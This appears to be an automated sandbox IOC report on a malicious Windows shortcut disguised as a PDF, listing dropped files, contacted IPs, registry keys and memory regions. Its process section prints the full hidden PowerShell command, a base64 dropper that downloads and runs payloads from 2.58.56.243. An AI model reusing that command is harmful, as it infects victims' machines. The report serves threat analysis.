IOC Report
Integration.pdf www.skype.com.lnk

loading gif

Files

File Path
Type
Category
Malicious
Integration.pdf www.skype.com.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Nov 14 16:00:32 2024, mtime=Mon Nov 18 14:07:07 2024, atime=Thu Nov 14 16:00:32 2024, length=245760, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x7fb962f7, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3f99399e-7832-4a8e-b6ed-ba4483bf1520.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241119181115Z-228.bmp
PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSIbd7e6.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hff1bw0j.uwu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrlfql21.ev0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-19 13-11-12-053.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\036632e1-1861-4f21-b384-44c930bda892.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\409bb123-804d-4b70-ac99-22a639541ef2.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\712d0de8-0c31-4ddc-9819-7ad9e4f3b121.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\e8e72f5f-6b2c-458e-b726-d41c9df7fd2b.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Roaming\vmapi.pdf
PDF document, version 1.4, 5 pages
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K')) | Invoke-Expression"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K')) | Invoke-Expression"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\vmapi.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1636,i,14726364720593086116,8068098665714155558,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8

URLs

Name
IP
Malicious
https://g.live.com/odclientsettings/Prod/C:
unknown
http://nuget.org/NuGet.exe
unknown
http://x1.i.lencr.org/
unknown
http://2.58.56.243
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://2.58.56.243/kghtyed.zipX
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
https://aka.ms/pscore68
unknown
http://2.58.56.243/vmapi.pdfX
unknown
http://2.58.56.243/vmapi.pdf
2.58.56.243
http://2.58.56.243/kghtyed.zip
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
15.164.165.52.in-addr.arpa
unknown
x1.i.lencr.org
unknown

IPs

IP
Domain
Country
Malicious
2.58.56.243
unknown
Netherlands
96.17.64.171
unknown
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
F3A85FE000
unkown
page readonly
1BC01F7C000
trusted library allocation
page read and write
2E33FF04000
heap
page read and write
1BC6A630000
heap
page read and write
1BC6A7AB000
heap
page read and write
7FFB4B4A3000
trusted library allocation
page read and write
B86AC7E000
stack
page read and write
7FFB4B310000
trusted library allocation
page read and write
2E33A929000
heap
page read and write
1C46BF99000
heap
page read and write
2E33A8A1000
heap
page read and write
2E33B540000
trusted library allocation
page read and write
1BC68670000
heap
page read and write
2E33FCE0000
trusted library allocation
page read and write
7FFB4B450000
trusted library allocation
page read and write
2E33B6D0000
trusted library section
page readonly
B86B0FE000
stack
page read and write
2E33FCC0000
trusted library allocation
page read and write
7FFB4B4E0000
trusted library allocation
page read and write
2E33A82F000
heap
page read and write
F3A7BFE000
stack
page read and write
2E33FE00000
heap
page read and write
7FFB4B01B000
trusted library allocation
page read and write
F3A8AFE000
unkown
page readonly
7FFB4B1E2000
trusted library allocation
page read and write
7DF4506B0000
trusted library allocation
page execute and read and write
7FFB4B2A0000
trusted library allocation
page read and write
2E33AFA0000
trusted library section
page read and write
1BC101B3000
trusted library allocation
page read and write
F3A857E000
stack
page read and write
1C46BFB1000
heap
page read and write
2E33FDB0000
trusted library allocation
page read and write
7FFB4B230000
trusted library allocation
page read and write
1BC686F0000
heap
page read and write
1C46BE53000
heap
page read and write
1BC685EA000
heap
page read and write
1BC6A89A000
heap
page read and write
F3A8CF9000
stack
page read and write
F3A867E000
stack
page read and write
F3A7EFE000
unkown
page readonly
B86BE8E000
stack
page read and write
B86B27D000
stack
page read and write
7FFB4B004000
trusted library allocation
page read and write
1BC68530000
heap
page read and write
2E33FF0C000
heap
page read and write
F3A8A7E000
stack
page read and write
1C46BE57000
heap
page read and write
7FFB4B340000
trusted library allocation
page read and write
1BC685EC000
heap
page read and write
1C46C006000
heap
page read and write
2E340030000
trusted library allocation
page read and write
2E33B201000
trusted library allocation
page read and write
F3A7AFE000
unkown
page readonly
7FFB4B0C0000
trusted library allocation
page execute and read and write
1BC6B1F0000
heap
page read and write
2E33FD00000
trusted library allocation
page read and write
1BC6A4CA000
heap
page read and write
F3A84FE000
unkown
page readonly
2E33A879000
heap
page read and write
2E33FEEE000
heap
page read and write
B86ACFC000
stack
page read and write
1BC6A7D7000
heap
page read and write
7FFB4B1BA000
trusted library allocation
page read and write
7FFB4B4D0000
trusted library allocation
page read and write
2E33B700000
trusted library section
page readonly
7FFB4B250000
trusted library allocation
page read and write
F3A8FFE000
unkown
page readonly
2E33FEC2000
heap
page read and write
1C46BEE1000
heap
page read and write
1BC6A7D4000
heap
page read and write
1BC68700000
heap
page read and write
F3A8DFE000
unkown
page readonly
2E33FD20000
trusted library allocation
page read and write
1BC6A4AC000
heap
page read and write
2E33B11A000
heap
page read and write
B86AA73000
stack
page read and write
1C46BEB9000
heap
page read and write
F3A82FE000
unkown
page readonly
1BC6A4AE000
heap
page read and write
2E33A813000
heap
page read and write
1BC6AFD0000
heap
page read and write
7FFB4B1A0000
trusted library allocation
page read and write
2E33A700000
heap
page read and write
1BC01632000
trusted library allocation
page read and write
1BC6B1F4000
heap
page read and write
1BC00C32000
trusted library allocation
page read and write
2E33FCE0000
trusted library allocation
page read and write
2E33A82B000
heap
page read and write
F3A877E000
stack
page read and write
1C46BEAE000
heap
page read and write
2E33FEC8000
heap
page read and write
7FFB4B377000
trusted library allocation
page read and write
7FFB4B4B0000
trusted library allocation
page read and write
1BC68765000
heap
page read and write
1BC6A7B9000
heap
page read and write
B86ADFD000
stack
page read and write
1BC6A280000
trusted library allocation
page read and write
B86BF0D000
stack
page read and write
7FFB4B4A0000
trusted library allocation
page read and write
1BC6AF10000
heap
page read and write
1BC68602000
heap
page read and write
2E33A902000
heap
page read and write
2E33FF02000
heap
page read and write
B86AE7D000
stack
page read and write
1BC6A710000
heap
page read and write
7FFB4B1C0000
trusted library allocation
page execute and read and write
1BC00232000
trusted library allocation
page read and write
B86BE0F000
stack
page read and write
2E33A913000
heap
page read and write
1BC6867D000
heap
page read and write
2E340020000
trusted library allocation
page read and write
F3A897E000
stack
page read and write
2E33B15A000
heap
page read and write
1BC6ACC0000
heap
page read and write
1BC686D0000
trusted library allocation
page read and write
1BC686B0000
trusted library allocation
page read and write
7FFB4B1D0000
trusted library allocation
page execute and read and write
7FFB4B002000
trusted library allocation
page read and write
1BC6AC70000
heap
page read and write
2E340080000
remote allocation
page read and write
1BC6A9F0000
heap
page read and write
2E33A87C000
heap
page read and write
F3A767B000
stack
page read and write
B86AAFE000
stack
page read and write
1BC6A90E000
heap
page read and write
2E33B6C0000
trusted library section
page readonly
2E33B113000
heap
page read and write
B86A7EE000
stack
page read and write
F3A88FE000
unkown
page readonly
7FFB4B3E4000
trusted library allocation
page read and write
1BC102EB000
trusted library allocation
page read and write
F3A7FFB000
stack
page read and write
7FFB4B003000
trusted library allocation
page execute and read and write
7FFB4B270000
trusted library allocation
page read and write
1BC6A5D0000
heap
page execute and read and write
1BC685E2000
heap
page read and write
B86C08B000
stack
page read and write
1BC016E9000
trusted library allocation
page read and write
1BC0008C000
trusted library allocation
page read and write
7FFB4B490000
trusted library allocation
page read and write
1BC6A814000
heap
page read and write
1BC686E0000
heap
page readonly
7FFB4B470000
trusted library allocation
page read and write
7FFB4B010000
trusted library allocation
page read and write
2E33BC50000
trusted library allocation
page read and write
7FFB4B000000
trusted library allocation
page read and write
2E33FEE5000
heap
page read and write
1BC686FC000
heap
page read and write
B86B07A000
stack
page read and write
7FFB4B290000
trusted library allocation
page read and write
F3A957E000
stack
page read and write
7FFB4B020000
trusted library allocation
page read and write
2E33B015000
heap
page read and write
7FFB4B2E0000
trusted library allocation
page read and write
7FFB4B460000
trusted library allocation
page read and write
2E33FE95000
heap
page read and write
1C46BE4F000
heap
page read and write
2E33A88F000
heap
page read and write
1BC6A76E000
heap
page read and write
7FFB4B2D0000
trusted library allocation
page read and write
2E33FCE1000
trusted library allocation
page read and write
F3A80FE000
unkown
page readonly
2E33B002000
heap
page read and write
7FFB4B360000
trusted library allocation
page read and write
2E33B000000
heap
page read and write
7FFB4B0B6000
trusted library allocation
page read and write
1BC6A878000
heap
page read and write
1BC6A4CE000
heap
page read and write
7FFB4B0E6000
trusted library allocation
page execute and read and write
2E33A83F000
heap
page read and write
1C46BE30000
heap
page read and write
2E33A800000
heap
page read and write
1BC6A9F3000
heap
page read and write
B86ABFE000
stack
page read and write
7FFB4B350000
trusted library allocation
page read and write
1BC01BFE000
trusted library allocation
page read and write
B86AEF9000
stack
page read and write
2E33B11A000
heap
page read and write
1BC685E4000
heap
page read and write
B86B2FB000
stack
page read and write
1C46BF67000
heap
page read and write
7FFB4B300000
trusted library allocation
page read and write
2E33FEE0000
heap
page read and write
F3A7CFE000
unkown
page readonly
F3A87FE000
unkown
page readonly
7FFB4B3E2000
trusted library allocation
page read and write
2E33FE2E000
heap
page read and write
2E33A8FF000
heap
page read and write
7FFB4B374000
trusted library allocation
page read and write
1BC685AF000
heap
page read and write
1BC01C07000
trusted library allocation
page read and write
1BC10070000
trusted library allocation
page read and write
2E33A8B0000
heap
page read and write
7FFB4B05C000
trusted library allocation
page execute and read and write
7FFB4B0B0000
trusted library allocation
page read and write
F3A89FE000
unkown
page readonly
1BC6A5E0000
heap
page execute and read and write
2E33FE42000
heap
page read and write
B86BCCE000
stack
page read and write
1BC68430000
heap
page read and write
1C46BF76000
heap
page read and write
F3A7DFC000
stack
page read and write
2E33FC50000
trusted library allocation
page read and write
B86AB7E000
stack
page read and write
7FFB4B480000
trusted library allocation
page read and write
2E33A720000
heap
page read and write
1C46BEC1000
heap
page read and write
2E33FE61000
heap
page read and write
2E33A891000
heap
page read and write
B86AD7F000
stack
page read and write
2E33FF0A000
heap
page read and write
2E33B102000
heap
page read and write
2E33B6B0000
trusted library section
page readonly
1C46C02D000
heap
page read and write
7FFB4B200000
trusted library allocation
page read and write
2E341000000
heap
page read and write
2E33A88C000
heap
page read and write
2E33FE40000
trusted library allocation
page read and write
F3A8B7E000
stack
page read and write
F3A8EFA000
stack
page read and write
7FFB4B320000
trusted library allocation
page read and write
1BC685A8000
heap
page read and write
2E33FDC0000
trusted library allocation
page read and write
7FFB4B4C0000
trusted library allocation
page read and write
7FFB4B240000
trusted library allocation
page read and write
7FFB4B210000
trusted library allocation
page read and write
2E33FD20000
trusted library allocation
page read and write
2E33FEF7000
heap
page read and write
7FFB4B44B000
trusted library allocation
page read and write
2E340080000
remote allocation
page read and write
1BC6A72F000
heap
page read and write
7FFB4B4F0000
trusted library allocation
page read and write
B86BDCD000
stack
page read and write
7FFB4B2C0000
trusted library allocation
page read and write
2E340010000
trusted library allocation
page read and write
1BC68760000
heap
page read and write
F3A83FB000
stack
page read and write
1BC10010000
trusted library allocation
page read and write
2E33FD10000
trusted library allocation
page read and write
1BC6A283000
trusted library allocation
page read and write
1BC6A73A000
heap
page read and write
2E33A8BD000
heap
page read and write
1BC6A4D8000
heap
page read and write
7FFB4B0BC000
trusted library allocation
page execute and read and write
2E33A8B4000
heap
page read and write
F3A86FE000
unkown
page readonly
2E33A8A7000
heap
page read and write
1BC6A759000
heap
page read and write
2E33FC60000
trusted library allocation
page read and write
F3A81FB000
stack
page read and write
F3A8BFE000
unkown
page readonly
1BC68705000
heap
page read and write
1BC102F9000
trusted library allocation
page read and write
B86AF76000
stack
page read and write
1BC685B5000
heap
page read and write
2E33B100000
heap
page read and write
2E33FD10000
trusted library allocation
page read and write
1BC68510000
heap
page read and write
1BC6A760000
heap
page read and write
7FFB4B120000
trusted library allocation
page execute and read and write
7FFB4B330000
trusted library allocation
page read and write
7FFB4B260000
trusted library allocation
page read and write
1BC016E4000
trusted library allocation
page read and write
1BC6A511000
heap
page read and write
7FFB4B1B1000
trusted library allocation
page read and write
2E33AA00000
heap
page read and write
2E33FE54000
heap
page read and write
2E340080000
remote allocation
page read and write
F3A79F7000
stack
page read and write
F3A887E000
stack
page read and write
2E33FEC0000
heap
page read and write
7FFB4B1F0000
trusted library allocation
page execute and read and write
1BC6862A000
heap
page read and write
1BC6A330000
heap
page read and write
1BC6A7E6000
heap
page read and write
1BC685A0000
heap
page read and write
2E33FEE9000
heap
page read and write
2E33FD49000
trusted library allocation
page read and write
1C46BF44000
heap
page read and write
1BC6A440000
heap
page read and write
B86BF88000
stack
page read and write
1BC6A87F000
heap
page read and write
7FFB4B00D000
trusted library allocation
page execute and read and write
2E33FD51000
trusted library allocation
page read and write
1C46BF0B000
heap
page read and write
1BC6A7DD000
heap
page read and write
B86B1FE000
stack
page read and write
2E33BC21000
trusted library allocation
page read and write
2E33A85A000
heap
page read and write
2E33FCD0000
trusted library allocation
page read and write
2E33FEFF000
heap
page read and write
1BC68570000
heap
page read and write
2E33FEFB000
heap
page read and write
1BC6A535000
heap
page read and write
7FFB4B280000
trusted library allocation
page read and write
1BC6A320000
heap
page execute and read and write
2E33B800000
trusted library allocation
page read and write
1BC6A5D7000
heap
page execute and read and write
2E33AE90000
trusted library allocation
page read and write
1BC685F0000
heap
page read and write
2E33A896000
heap
page read and write
1BC68710000
trusted library allocation
page read and write
F3A95FE000
unkown
page readonly
2E33A873000
heap
page read and write
7FFB4B2B0000
trusted library allocation
page read and write
2E33B6F0000
trusted library section
page readonly
1C46C01D000
heap
page read and write
7FFB4B2F0000
trusted library allocation
page read and write
2E33FDB0000
trusted library allocation
page read and write
2E33FE30000
trusted library allocation
page read and write
7FFB4B220000
trusted library allocation
page read and write
1C46BFBB000
heap
page read and write
2E33FE4F000
heap
page read and write
B86BD4E000
stack
page read and write
1BC10001000
trusted library allocation
page read and write
2E33FD24000
trusted library allocation
page read and write
2E33B6E0000
trusted library section
page readonly
B86B17E000
stack
page read and write
1BC00001000
trusted library allocation
page read and write
2E33FE21000
heap
page read and write
B86AFFC000
stack
page read and write
1C46BFEF000
heap
page read and write
There are 312 hidden memdumps, click here to show them.